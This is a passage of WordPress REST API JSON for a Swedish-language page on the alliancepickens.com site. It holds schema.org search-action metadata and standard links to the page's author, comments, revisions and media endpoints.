County","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/alliancepickens.com\/sv\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"sv-SE"}]}},"_links":{"self":[{"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/pages\/8670","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/comments?post=8670"}],"version-history":[{"count":0,"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/pages\/8670\/revisions"}],"wp:attachment":[{"href":"https:\/\/alliancepickens.com\/sv\/wp-json\/wp\/v2\/media?parent=8670"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}